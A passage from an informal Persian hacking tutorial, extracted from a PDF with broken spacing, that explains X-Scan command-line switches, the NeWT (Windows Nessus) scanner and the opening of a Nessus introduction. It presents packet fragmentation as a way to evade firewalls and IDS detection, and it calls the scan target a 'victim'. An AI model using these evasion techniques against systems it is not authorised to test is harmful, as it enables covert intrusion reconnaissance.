ﺕﻤﺎم ﺱﺮویﺲ هﺎی ﮐﻪ ﺏﺮای ﺁن ‪ scripts‬دارد را ﭘﻮیﺶ ﻣﻴﮑﻨﺪ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٤٤‬‬

‫ﺟﺪول ﺷﻤﺎرﻩ دو ‪:‬‬ ‫‪١‬‬

‫ﺱﻮیﭻ‬ ‫‪-i‬‬

‫‪٢‬‬

‫‪-l‬‬

‫‪٣‬‬

‫‪-v‬‬

‫‪۴‬‬

‫‪-p‬‬

‫‪۵‬‬

‫‪-o‬‬

‫‪۶‬‬

‫‪-t‬‬

‫‪٧‬‬

‫‪-log‬‬

‫ﺕﻮﺽﻴﺤﺎت‬ ‫ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺎیﺪ ﺏﻌﺪ از ﺁن ﻧﺎم ﮐﺎرت ﺷﺒﮑﻪ ﻣﻮرد اﺱﺘﻔﺎدﻩ ﺧﻮد یﺎ ﺷﻤﺎرﻩ )‪ (IP‬ﺁن را‬ ‫وارد ﮐﻨﻴﺪ )ﺏﺮای ﺁﻧﻬﺎیﯽ ﮐﻪ ﺕﻮﺱﻂ ﮐﺎرت ﺷﺒﮑﻪ ﻗﺴﻂ ﭘﻮیﺶ را دارﻧﺪ(‪ .‬اﻟﺒﺘﻪ وارد ﮐﺮدن ‪ IP‬ﺧﻮدﺕﺎن‬ ‫ﺏﺮای ﮐﺴﺎﻧﯽ ﮐﻪ ﺏﻪ وﺱﻴﻠﻪ ﻣﻮدم ﺏﻪ ایﻨﺘﺮﻧﺖ یﺎ هﺮ ﺷﺒﮑﻪ ای ﮐﻪ وﺻﻞ ﻣﻴﺸﻮﻧﺪ ﺧﺎﻟﯽ از ﻓﺎیﺪﻩ ﻧﻴﺴﺖ‪.‬‬ ‫ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺮای ﺷﻤﺎ یﮏ ﻟﻴﺴﺘﯽ ﮐﻪ ﺡﺎوی ﺷﻤﺎرﻩ هﺎی ﮐﺎرت ﺷﺒﮑﻪ ﺷﻤﺎ اﺱﺖ ﻣﯽ‬ ‫ﺁورد‪.‬‬ ‫ایﻦ ﺱﻮیﭻ ﺏﺎﻋﺚ ﻧﻤﺎیﺶ ﺟﺰﺋﻴﺎت هﻴﻦ اﻧﺠﺎم ﮐﺎر ﻣﻴﺸﻮد یﺎ ﺏﻪ ﻋﺒﺎرﺕﯽ روﻧﺪ اﻧﺠﺎم ﮐﺎر را ﺏﻪ ﺷﻤﺎ ﻧﺸﺎن‬ ‫ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ﺱﻮیﭻ ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﮐﻪ اﮔﺮ یﮏ ﻣﻴﺰﺏﺎﻧﯽ ﺏﻪ ﻣﺎ در ﺟﻮاب ‪ Ping‬ﭘﺎﺱﺨﯽ ﻧﺪاد ﺁن را ﻧﺎدیﺪﻩ ﺏﮕﻴﺮد و‬ ‫ﺏﻪ ﺱﺮاغ ﺏﻌﺪی ﺏﺮود‪.‬‬ ‫ایﻦ ﺱﻮیﭻ ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﮐﻪ اﮔﺮ ﺏﺮ یﮏ ﻣﻴﺰﺏﺎن یﮏ ﭘﻮرت ﺏﺎز هﻢ ﭘﻴﺪا ﻧﮑﺮد ﺁن را ﻧﺎدیﺪﻩ ﺏﮕﻴﺮد و ﺏﻪ‬ ‫ﺱﺮاغ ﺏﻌﺪی ﺏﺮود‪.‬‬ ‫ﺧﻮب ایﻦ یﮑﯽ از ﻣﮑﺎﻧﻴﺰم هﺎی ﻣﺨﻔﯽ ﻣﺎﻧﺪن اﺱﺖ ﮐﻪ در ﺏﺎﻻ ﺕﺮ هﺎ ﺏﺮای ﺏﺮﻧﺎﻣﻪ ‪ nmap‬ﮔﻔﺘﻢ ﭼﯽ‬ ‫هﺴﺖ ‪ .‬ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﮔﺰیﻨﻪ ﺏﺮﻧﺎﻣﻪ ﺏﺴﺘﻪ هﺎ را ﺕﮑﻪ ﺕﮑﻪ ﮐﺮدﻩ و ﻣﻴﻔﺮﺱﺘﺪ ﮐﻪ ﺷﻨﺎﺱﺎیﯽ ﺷﻤﺎ ﻣﺸﮑﻞ‬ ‫ﻣﻴﺸﻮد و اﺡﺘﻤﺎل ﻋﺒﻮر ﺏﺴﺘﻪ هﺎ از دیﻮار ﺁﺕﺶ ﺧﻴﻠﯽ زیﺎد ﺕﺮ ﻣﻴﺸﻮد و هﻤﭽﻨﻴﻦ ﺡﺬف ﺏﺴﺘﻪ ﺕﻮﺱﻂ ﻓﻴﻠﺘﺮ‬ ‫هﺎ و ﻣﺴﻴﺮیﺎب هﺎ اﺡﺘﻤﺎل ایﻦ اﺕﻔﺎق هﻢ ﮐﻤﺘﺮ ﺷﺪﻩ اﻣﺎ اﺡﺘﻤﺎل ﻧﺘﻴﺠﻪ ﮔﺮﻓﺘﻦ ﺻﺤﻴﺢ ﮐﻤﺘﺮ ﻣﻴﺸﻮد اﻟﺒﺘﻪ‬ ‫ﺏﺎ ایﻦ ﮐﺎر دزد ﮔﻴﺮ یﺎ هﻤﺎن اﻓﺴﺮ ﺧﻮدﻣﺎن ) ‪ ( IDS‬دیﮕﻪ ﻓﻌﺎل ﻧﻤﻴﺸﻮد ﺏﺮای ﻣﺎ‪ .‬ﺏﻌﺪ از ایﻦ ﺱﻮیﭻ‬ ‫ﺷﻤﺎ ﺏﺎیﺪ ﺕﻌﺪاد ﺕﮑﻪ ﺕﮑﻪ ﺷﺪن هﺮ ﺏﺴﺘﻪ را ﻣﺸﺨﺺ ﮐﻨﻴﺪ ﺕﻌﺪاد ﺁن را ‪ .‬اﻟﺒﺘﻪ اﻣﮑﺎن اﺱﺘﻔﺎدﻩ از ﺱﻮیﭻ‬ ‫ﺧﺎﻟﯽ ﺕﻴﺰ هﺴﺖ ﮐﻪ ﺕﻌﺪاد ﺧﻮرد ﮐﺮدن ﺏﺴﺘﻪ را ﺧﻮدش ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ﮐﻪ ﺏﺪ هﻢ ﻧﻴﺴﺖ‪.‬‬ ‫ﮐﻪ ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﻌﺪ از ﺁن ﺏﺎیﺪ ﻧﺎم ﻓﺎیﻞ ﻧﺘﻴﺠﻪ را ﺏﻪ یﮑﯽ از دو ﻓﺮﻣﺖ ‪ txt‬و یﺎ ‪ html‬را‬ ‫وارد ﮐﻨﻴﺪ‪ .‬ایﻦ ﮐﺎر را ﻧﮑﻨﻴﺪ ﺏﻬﺘﺮ) از ایﻦ ﺱﻮیﭻ اﺱﺘﻔﺎدﻩ ﻧﮑﻨﻴﺪ ( اﺱﺖ زیﺮا ﺏﺪون ایﻦ ﺱﻮیﭻ ﺧﻮد‬ ‫ﺏﺮﻧﺎﻣﻪ ﻓﺎیﻞ ﻧﺘﻴﺠﻪ را ﺏﺎ ﻧﺎم ‪ IP‬ﻣﺎﺷﻴﻦ هﺪف ﺏﺎ هﺮ دو ﻓﺮﻣﺖ در ﭘﻮﺷﻪ ‪ log‬ﮐﻪ در ﭘﻮﺷﻪ ﺧﻮد ﺏﺮﻧﺎﻣﻪ‬ ‫اﺱﺖ ایﺠﺎد ﻣﻴﮑﻨﺪ‪.‬‬

‫ﺧﻮب واﻗﻌًﺎ ﮐﺎر ایﻦ ﺏﺮﻧﺎﻣﻪ ﮐﺎر درﺱﺖ اﺱﺖ ‪،‬اﻟﺒﺘﻪ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ هﻤﻴﺸﻪ از ﺱﺎیﺖ ‪ Nessus‬اﺧﺮیﻦ ‪ scripts‬ه ﺎی ‪ nasl‬را ﺏﮕﻴﺮی ﺪ و داﺧ ﻞ ﭘﻮﺷ ﻪ‬ ‫‪ scripts‬ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺮیﺰیﺪ ﺕﺎ ﺏﻬﺘﺮیﻦ ﻧﺘﺎیﺞ را دریﺎﻓﺖ ﮐﻨﻴﺪ و یﺎ از اﻣﮑﺎن ‪ Update‬ﺧﻮد ﺏﺮﻧﺎﻣﻪ اﺱﺘﻔﺎدﻩ ﮐﺮدﻩ‪.‬‬ ‫ﮐﻠﻴﮏ ﻣﻴﮑﻨﻴﺪ ﺕ ﺎ‬

‫ﺧﻮب ﮐﺎر ﺏﺎ راﺏﻂ ﮐﺎرﺏﺮی ایﻦ ﺏﺮﻧﺎﻣﻪ راﺡﺖ اﺱﺖ اول ﺏﻌﺪ ﺏﺎﻻ ﺁﻣﺪن ایﻦ ﺏﺮﻧﺎﻣﻪ ﺕﺮﮐﻴﺐ ‪ Ctrl+E‬را زدﻩ یﺎ روی دﮐﻤﻪ‬ ‫ﺏﻪ ﺏﺨﺶ ﺕﻨﻈﻴﻤﺎت ﺏﺮویﺪ‪.‬‬ ‫در ﺻﻔﺤﻪ ‪ General‬ﺷﻤﺎ ‪ IP‬ﻣﺎﺷﻴﻦ ﻣﻮرد ﻧﻈﺮ ﺧﻮد را وارد ﻣﻴﮑﻨﺪ در ﻗﺴﻤﺖ ﮐﻨﺎری ﺁن ﻣﻴﺘﻮاﻧﻴﺪ ﻧ ﻮع ﺷ ﻴﻮﻩ ﮔ ﺰارش ﺧ ﻮد را اﻧﺘﺨ ﺎب ﮐﻨﻴ ﺪ و ﻧ ﺎم‬ ‫ﺁن را ﻋﻮض ﮐﻨﻴﺪ و‪..‬‬ ‫در ﺻﻔﺤﻪ ‪ Advanced‬ﺷﻤﺎ در ﻗﺴﻤﺖ اول ﺁن ﺷﻤﺎ ﻣﻴﺰان ﺕﮑﻪ ﺕﮑﻪ ﮐﺮدن ﻓﺎیﻞ ﺏﺮای ﻣﺨﻔﯽ ﻣﺎﻧﺪن را ﻣﺸﺨﺺ ﻣﻴﮑﻨﻴﺪ)ﺏﺮای ﺕﻮﺽﻴﺤﺎت ﺏﻴ ﺸﺘﺮ ﺏ ﻪ‬ ‫ﺏﺨﺶ ﺧﻂ ﻓﺮﻣﺎن ﻣﺮاﺟﻌﻪ ﮐﻨﻴﺪ(‪ .‬در ﺏﺨﺶ دوم ﮔﺰیﻨﻪ اول در ﺻﻮرت ﻋﻼﻣﺖ زدن روﻧﺪ ﭘﻴﺸﺮﻓﺖ ﮐﺎر را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ‪.‬‬ ‫ﺏﺮای ﮔﺰیﻨﻪ ‪ skip host when failed to get response‬ﺏﻪ ﺕﻮﺽﻴﺤﺎت ﺱﻮیﭻ ‪ –p‬ﻣﺮاﺟﻌﻪ ﺷﻮد‪.‬‬ ‫ﺏﺮای ﮔﺰیﻨﻪ ‪ skip host when no open port has bin failed‬ﺏﻪ ﺕﻮﺽﻴﺤﺎت ﺱﻮیﭻ ‪ –o‬ﻣﺮاﺟﻌﻪ ﮐﻨﻴﺪ‪.‬‬ ‫ﮔﺰیﻨﻪ ‪ Scan Always‬ﭼﻪ ﭘﻮرت ﺏﺎز ﭘﻴﺪا ﮐﻨﺪ یﺎ ﻧﮑﻨﺪ یﺎ ﻣﺎﺷﻴﻦ ﺟﻮاب ﺏﺪه ﺪ ی ﺎ ﻧﺪه ﺪ اﻧﺠ ﺎم ﻣﻴﺪه ﺪ‪ ) .‬ﻣﻌ ﺎدل ای ﻦ ﮔﺰیﻨ ﻪ در ﺧ ﻂ ﻓﺮﻣ ﺎن ﻣ ﺴﺎوی ﺏ ﺎ‬ ‫اﺱﺘﻔﺎدﻩ ﻧﮑﺮدن از هﻴﭻ ﮐﺪام از ﺱﻮیﭻ هﺎی ‪ –p‬و ‪ –o‬اﺱﺖ (‬ ‫در ﺻﻔﺤﻪ ‪ Port‬ﺷﻤﺎ ﻟﻴﺴﺖ ﭘﻮرت هﺎیﯽ را ﮐﻪ ﺏﺎیﺪ ﺏﮕﺮدد و ﻣﮑﺎﻧﻴﺰم ﺁن و ﻣﻌﺎدل ﭘﻮرت هﺎی ﭘﻴﺶ ﻓﺮض را ﺕﻨﻈﻴﻢ ﻣﻴﮑﻨﻴﺪ‪.‬‬ ‫در ﺻﻔﺤﻪ هﺎی ﺏﻌﺪی هﻢ یﮏ ﺱﺮی ﭼﻴﺰ دیﮕﻪ ﺡﺎﻻ ﺏﻌﺪ از ﭘﻴﮑ ﺮ ﺏﻨ ﺪی ﻣ ﻮرد ﻋﻼﻗ ﻪ ﺧ ﻮد دﮐﻤ ﻪ ‪ OK‬را زدﻩ ﺕ ﺎ ﺕﻐﻴ ﺮات در ﻓﺎی ﻞ ‪ Config‬ذﺧﻴ ﺮﻩ‬ ‫ﺷﻮد ﺡﺎﻻ ﺏﺎ ﮐﻠﻴﺪ روی دﮐﻤﻪ ﺷﺮوع ) یﮏ ﻓﻠﺶ ﺱﺒﺰ ﺏﺎﻻ هﺴﺖ ( ﮐﺎر ﺷﺮوع ﻣﻴﺸﻮد‪.‬‬ ‫ﺧﻮب ﺏﻌﺪ از ﺕﻤﺎم ﮐﺎر ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ ﻧﺘﻴﺠﻪ را ﻣﺸﺎهﺪﻩ ﮐﻨﻴﺪ ﮐﻪ ﺏﺮای هﺮ ﺡﻔﺮﻩ یﮏ ﺷﻤﺎرﻩ ‪ ID‬دادﻩ اﺱﺖ ﮐﻪ ﺏ ﺎ ه ﻢ ﻣﺘﻔ ﺎوت ه ﺴﺘﻨﺪ ﺕ ﺎ ایﻨﺠ ﺎ را داﺷ ﺘﻪ‬ ‫ﺏﺎﺷﻴﺪ ﺕﺎ ﺏﻘﻴﻪ ﻧﺮم اﻓﺰارهﺎ را ﺏﻪ ﺷﻤﺎهﺎ یﺎد ﺏﺪم ﺏﻌﺪ ﺏﮕﻢ ﺏﺎ ایﻦ ﻋﺪد ﭼﻪ ﮐﺎر ﺏﺎیﺪ ﺏﮑﻨﻴﺪ‪.‬‬ ‫ای یﺎدم رﻓﺖ ﺏﮕﻢ ﮐﻪ ایﻦ ﺏﺮﻧﺎﻣﻪ ی ﮏ ﻧ ﺴﺨﻪ از ‪ Winpcap‬را هﻤ ﺮاﻩ ﺧ ﻮدش دار دو اﻟﺒﺘ ﻪ ﺕﻤ ﺎم ه ﺮ ﭼﻴ ﺰی را ﮐ ﻪ ﻻزم دارد و ﻣﺜ ﻞ ﺧﻴﻠ ﯽ از ﻧ ﺮم‬ ‫اﻓﺰارهﺎی هﮏ ﮐﻪ از ﻟﻴﻨﻮﮐﺲ ﺁﻣﺪﻩ اﻧﺪ ﻧﻴﺴﺖ ﮐﻪ یﮏ دو ﺟﻴﻦ ﺏﺮﻧﺎﻣﻪ را ﺏﺮاش ﺏﺎیﺪ ﻧﺼﺐ ﮐﻨﯽ ﺕﺎ ﺏﺮای ﺷﻤﺎ ﮐﺎر ﮐﻨﺪ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٤٥‬‬

‫ﻧﺴﺨﻪ ویﻨﺪوز‪ Nessus‬ﺏﺮﻧﺎﻣﻪ ‪: NeWT Security Scanner‬‬ ‫ایﻦ ﻧﺮم اﻓﺰار ایﻦ ﺷﮑﻠﯽ ﮐﻪ ﭘﺎیﻴﻦ ﻣﯽ ﺏﻴﻨﻴﺪ ‪:‬‬

‫ﺧﻮب ایﻦ هﻢ ﻣﺜﻞ ﺏﺎﻻیﯽ اﺱﺖ ﮐﺎرش ‪ ،‬اﮔﺮ ﻣﻴﺨﻮاهﻴﺪ رایﺎﻧﻪ ﺧﻮدﺕ ﺎن را ﭘ ﻮیﺶ ﮐﻨﻴ ﺪ ﻣ ﻦ ای ﻦ ﺕﻮﺻ ﻴﻪ ﻣﻴﮑ ﻨﻢ!! ) ﭼ ﻮن واﻗﻌ ًﺎ ﻧﻔﻬﻤ ﻢ اﺱ ﺖ ﺏ ﻪ ﻣﻌﻨ ﯽ‬ ‫واﻗﻌﯽ ﮐﻠﻤﻪ ﺏﺮای ایﻨﮑﻪ ﻣﻴﮕﻮیﺪ " ﻣﻦ ﺏﻪ ﺷﻤﺎ در ﻧﺴﺨﻪ رایﮕﺎن ایﻦ ﻣﺤﺼﻮل اﺟ ﺎزﻩ ﻣﻴ ﺪهﻢ ‪ IP‬ه ﺎی ﮐ ﻼس ‪ C‬را ﭘ ﻮیﺶ ﮐﻨﻴ ﺪ " اﻣ ﺎ ﺁﻧﻬ ﺎیﯽ ﮐ ﻪ ای ﻦ‬ ‫داﻧﻠﻮد ﮐﺮدن ﻣﯽ داﻧﻨﺪ ﮐﻪ ﻓﻘﻂ اﺟﺎزﻩ ﻣﻴﺪهﺪ ﮐﻪ رایﺎﻧﻪ ﺧﻮدﺕﺎن را اﺱﮑﻦ ﮐﻨﻴﺪ یﮏ ﺕﻮﺽﻴﺢ ﺏﺪم ‪ IP‬هﺎی ﮐ ﻼس ‪ C‬ﺁن ‪ Ip‬ه ﺎیﯽ ه ﺴﺘﻨﺪ ﮐ ﻪ ﻋ ﺪد ﺱ ﻤﺖ‬ ‫ﭼﭗ ﺏﻴﻦ ‪ ١٩٢‬ﺕﺎ ‪ ٢٢٣‬اﺱﺖ اﻟﺒﺘﻪ درﺏﺎرﻩ اﺻﻮل ﭘﺎیﻪ ای هﻤﭽﻮن ایﻦ ﺏﻌﺪا ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ در ﺽﻤﻴﻤﻪ ﻣﻘﺎﻟﻪ (‬ ‫ﺧﻮب ایﻦ ﻧﺮم اﻓﺰار یﮏ ﻧﺴﺨﻪ ﺡﺮﻓﻪ ای هﻢ دارد ﺏﻪ ﻧﺎم ‪) NeWT Pro‬ﺏ ﻪ ﺡ ﺮوف ﮐﻮﭼ ﮏ و ﺏ ﺰرگ ﺕﻮﺟ ﻪ ﮐﻨﻴ ﺪ ﭼ ﻮن ی ﮏ ﺏﺮﻧﺎﻣ ﻪ اﺱ ﺖ ﮐ ﻪ ﺏ ﺎ‬ ‫هﻤﻴﻦ اﺱﻢ ﮐﻪ ﺕﻤﺎم ﺡﺮوف ﺁن ﺏﺰرگ اﺱﺖ( ﮐﻪ ﻣﺤﺪودیﺖ اﺱﮑﻦ ﻧﺪارد اﻣﺎ هﻨﻮز ﺏﺪﺱﺖ ﻣﻦ ﻧﺮﺱﻴﺪﻩ ‪.‬‬ ‫ایﻦ ﺏﺮﻧﺎﻣﻪ هﻢ دارای یﮏ راﺏﻂ ﮐﺎرﺏﺮی اﺱﺖ ﮐﻪ دﻗﻴﻘﺎ ﻣﺜﻞ ﺏﺎﻻی اﺱﺖ ﻓﺎیﻞ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﻧﺎم ‪ NeWTCmd‬اﺱﺖ ﮐﻪ ﺏﻌﺪ از اﺟﺮا ایﻦ ﺷﮑﻠﯽ ‪:‬‬ ‫‪C:\Tenable\NeWT>NeWTCmd.exe‬‬ ‫‪NeWTCmd 2.1 -- Copyright (C) 2003 - 2004 Tenable Network Security‬‬ ‫>‪Usage: NeWTCmd [scan target]
‫اﻣﻴ ﺪوار ه ﺴﺘﻢ ﮐ ﻪ ای ﻦ ﺏ ﺎ ﻧ ﺮم اﻓ ﺰار ﺏ ﺎﻻی ی ﮏ ﻣﻘﺎی ﺴﻪ ﺏﮑﻨﻴ ﺪ ﺏﻌ ﺪ ﻣﻴﻔﻬﻤﻴ ﺪ ﮐ ﻪ اﺟﺤ ﺎﻓﯽ در ﺡ ﻖ ‪ X-Scan‬ﺷ ﺪﻩ ﮐ ﻪ اﺱ ﻤﺶ و ﻟﻴﻨ ﮏ ﺁن در ﺱ ﺎیﺖ‬ ‫‪ Nessus‬ﻗﺮار ﻧﺪادﻩ اﻧﺪ ﺏﻌﺪ ﻟﻴﻨﮏ ایﻦ در ﭘﻴﺖ را ﮔﺬاﺷﺘﻨﺪ ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٤٦‬‬

‫ایﻦ هﻢ دﻟﻴﻠﯽ ﺏﺮ ﻧﻔﻬﻤﻢ ﺏﻮدن ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﻏﺎیﺖ !!!‬

‫ﺧﻮب ﻣﺎ ایﻦ را هﻢ ذﮐﺮ ﮐﻨﻢ ﺕﻮ ﺷﺒﮑﻪ ﺧﺎﻧﻪ ﺧﻮدﻣﺎن هﻢ ﺁزﻣﺎیﺶ ﮐﺮدم هﻢ ﺕﻮ ﺷﺒﮑﻪ ﺟﻬﺎﻧﯽ وﻟﯽ " اﺷﮑﻮل " ﺏﺎز ایﻦ را ﺏﻪ ﻣﺎ ﺟﻮاب داد ‪.‬‬ ‫وﻟﯽ ﻧﻤﻴﺸﻮد در ﺡﻖ ایﻦ ﺏﺮﻧﺎﻣﻪ اﺟﺤﺎف ﮐﺮد ﮐﺎرش درﺱﺖ اﺱﺖ ﺏﺮای اﺱﮑﻦ ﺧﻮد رایﺎﻧﻪ ﺷﻤﺎ‪ .‬ﺧﻴﻠﯽ ﺷﺒﻴﻪ ‪ Nessus‬اﺱﺖ‪ .‬اول ﺱ ﺮور ﺁن ﺏﺎی ﺪ ﺏ ﺎﻻ‬ ‫ﺏﺎﺷﺪ ﮐﻪ اﺻﻮﻻ هﻤﻴﺸﻪ ﺧﺪا ﺏﺎﻻ اﺱﺖ ﺏ ﺮای ﺧ ﺎﻣﻮش ﮐ ﺮدﻧﺶ ﺏﺎی ﺪ از ﺏﺮﻧﺎﻣ ﻪ هﻤ ﺮاﻩ ﺧ ﻮدش ﺏ ﺎ ﻧ ﺎم ‪ Scan Server Configuration‬ﺏﺎی ﺪ اﺱ ﺘﻔﺎدﻩ‬ ‫ﮐﻨﻴﺪ ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ ﮐﻪ ﺏﻪ ﻏﻴﺮ از ﻣﻮارد اﺱﺘﻔﺎدﻩ ﺡﺘﻤﺎ از ﮐﺎر ﺏﻴﻨﺪازد ایﻦ ﺱﺮور را‪.‬‬ ‫ﺧﻮب یﮏ ﺏﺮﻧﺎﻣﻪ ﺧﻮب هﻤﺮاﻩ ایﻦ ﻧﺮم اﻓﺰار اﺱﺖ ﺏﻪ ﻧﺎم ‪ nasl.exe‬ﮐﻪ ﮐﺎرش ویﺮایﺶ ‪ scripts‬هﺎی ‪ Nasl‬اﺱﺖ ﮐﻪ ﻣﻴﺸﻮد ﺕﻐﻴﺮات ﻣ ﻮرد ﻧﻈ ﺮ‬ ‫ﺧﻮد را روی ﺁﻧﻬﺎ اﻋﻤﺎل ﮐﺮد اﻟﺒﺘﻪ ﻣﻴﺸﻮد ﺏﺮای ﺕﻤ ﺎﻣﯽ ﻧ ﺮم اﻓﺰاره ﺎیﯽ ﮐ ﻪ از ‪ scripts‬ه ﺎی ‪ Nessus‬اﺱ ﺘﻔﺎدﻩ ﻣﻴﮑﻨﻨ ﺪ ﺏ ﻪ ﮐ ﺎر ﺏ ﺮد‪ .‬در ﮐ ﻞ ﺧ ﻮب‬ ‫اﺱﺖ ایﻦ ﺏﻪ ﺧﻮدﺕﺎن ﻣﻴﺴﭙﺎرم !!‬ ‫ﮐﺎر ﺏﺎ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺱﺎدﻩ اﺱﺖ ﺏﻌﺪ از وارد ﮐﺮدن ‪ IP‬ﻗﺮﺏﺎﻧﯽ و زدن ﮐﻠﻴﺪ ‪ Next‬ﺷﻤﺎ ﺏﻪ ﺻﻔﺤﻪ ﻣﻴﺮویﺪ ﮐﻪ در ﺁﻧﺠﺎ ﭼﻬﺎر ﮔﺰیﻨﻪ اﺱ ﺖ ﮐ ﻪ ﺏ ﻪ ﺕﺮﺕﻴ ﺐ‬ ‫ﻋﺒﺎرﺕﻨﺪ از‪:‬‬ ‫ﮔﺰیﻨﻪ )‪ : Enable all but dangerous plugins (Recommended‬یﻌﻨﯽ ﺕﻤﺎم ‪ scripts‬ﺏﺠﺰ ‪ scripts‬ه ﺎی ﺧﻄﺮﻧ ﺎک ﮐ ﻪ ﺏﺎﻋ ﺚ ﻧ ﺎ ﭘﺎی ﺪاری‬ ‫ﺱﻴﺴﺘﻢ ﻣﯽ ﺷﻮد یﺎ ﺏﺎﻋﺚ ﻟﻮ رﻓﺘﻦ ﻣﯽ ﺷﻮد‪.‬‬ ‫ﮔﺰیﻨﻪ )‪ : Enable all plugins (Even dangerous plugins are enabled‬ﮐﻪ یﻌﻨﯽ ﺕﻤﺎم ‪ scripts‬هﺎ ﺏﻌﻼوﻩ ‪ scripts‬هﺎی ﺧﻄﺮﻧﺎک‪.‬‬ ‫ﮔﺰیﻨﻪ )‪ : Use a predefined plugin set (You can manage them here‬ﺏ ﺎ اﻧﺘﺨ ﺎب ای ﻦ ﮔﺰیﻨ ﻪ ی ﮏ ﺱ ﺮی ﭘ ﻮیﺶ ه ﺎی دﺱ ﺘﻪ ﺏﻨ ﺪی ﺷ ﺪﻩ‬ ‫اﻧﺠﺎم ﻣﻴﺪهﺪ ﮐﻪ اﻟﺒﺘﻪ ﺟﺰﺋﻴﺎت ﻗﺎﺏﻞ ﺕﻨﻈﻴﻢ ﻧﻴﺴﺖ و ﺷﻤﺎ ﺏﺎیﺪ دﺱﺘﻪ ﻣﻮرد ﻧﻈﺮ ﺧﻮد را اﻧﺘﺨﺎب ﮐﻨﻴﺪ‪.‬‬ ‫ﮔﺰیﻨﻪ )‪ : Define my own set of plugins (For advanced user‬ﮐﻪ ﺏﺎ اﻧﺘﺨﺎب ایﻦ ﮔﺰیﻨﻪ ﺏﺎیﺪ ‪ scripts‬هﺎی ﻣﻮرد ﻋﻼﻗﻪ ﺧﻮد را اﻧﺘﺨﺎب‬ ‫ﮐﻨﻴﺪ ﺏﻌﺪ ﭘﻮیﺶ را ﺷﺮوع ﮐﻨﻴﺪ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٤٧‬‬

‫ﺧﻮب یﮑﯽ را ﺏﻪ ﻓﺮاﺧﻮر ﺡﺎل ﺧﻮد اﻧﺘﺨﺎب ﮐﺮدﻩ یﺎ اﮔﺮ ﺱﻪ ﮔﺰیﻨﻪ اوﻟﯽ ﺏﺪرد ﺷ ﻤﺎهﺎ ﻧﻤ ﯽ ﺧ ﻮرد و ی ﺎ ﻣﻴﺨﻮاهﻴ ﺪ ﺧﻮدﺕ ﺎن اﻧﺘﺨ ﺎب ﮐﻨﻴ ﺪ درﺏ ﺎرﻩ ﭼ ﻪ‬ ‫ﺏﮕﺮدد ﮔﺰیﻨﻪ ﺁﺧﺮ را اﻧﺘﺨﺎب ﮐﻨﻴﺪ ﮐﻪ در ﺁﻧﺠﺎ هﺮ ﭼﻪ ﺧﻮاﺱﺘﻴﺪ اﻧﺘﺨﺎب ﮐﻨﻴﺪ ﺏﻌﺪ ﺷﺮوع ﺏﻪ ﭘﻮیﺶ ﮐﻨﻴﺪ‪.‬‬ ‫ﺏﻪ ایﻦ ﺕﺮﺕﻴﺐ ﻣﻴﺸﻮد ﮔﻔﺖ یﮏ ﭘﻮیﺶ ﺏﺎ ‪ %٩٠‬از اﻣﮑﺎﻧﺎت ﺏﺮﻧﺎﻣﻪ ‪ Nessus‬را اﻧﺠﺎم دادﻩ ایﺪ هﻤﻴﻦ دیﮕﺮ‪.‬‬ ‫ﻣﻌﺮﻓﯽ ﺏﺮﻧﺎﻣﻪ ‪: Nessus‬‬ ‫ﻗﺒﻞ از هﺮ ﭼﻴﺰ ﺏﺎیﺪ ایﻦ ﺱﺮﻃﺎن را ﻧﺼﺐ ﮐﻨﻴﺪ‪ .‬ﻧﺼﺐ ایﻦ ﺷﺒﺢ ﻣ ﺴﺘﻠﺰم ﻧ ﺼﺐ دو ﺏﺮﻧﺎﻣ ﻪ دیﮕ ﺮ ﺏ ﺎ ﻋﻨ ﻮان ‪ GIMP Toolkit‬ی ﺎ ‪ GTK‬و ‪nmap‬‬ ‫ﻣﻴﺒﺎﺷﺪ ﮐﻪ ﻣﻌﻤﻮﻻ ﺷﻤﺎ اﮔﺮ ﻣﻮﻗﻊ ﻧﺼﺐ ﻟﻴﻨﻮﮐﺲ یﺎ هﺮ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ﮐﺪ ﺏﺎز ﮔﺰیﻨﻪ هﺎی ﻣﺪیﺮیﺘﯽ را اﻧﺘﺨﺎب ﮐﺮدﻩ ﺏﺎﺷﻴﺪ ای ﻦ ﻣﺮﺡﻠ ﻪ را ﻻزم ﻧﺪاری ﺪ‪.‬‬ ‫ﺏﺮﻧﺎﻣﻪ ‪ Nessus‬در ﭼﻬﺎر ﻗﺎﻟﺐ ﻣﺨﺘﻠﻒ ﺏ ﺎ 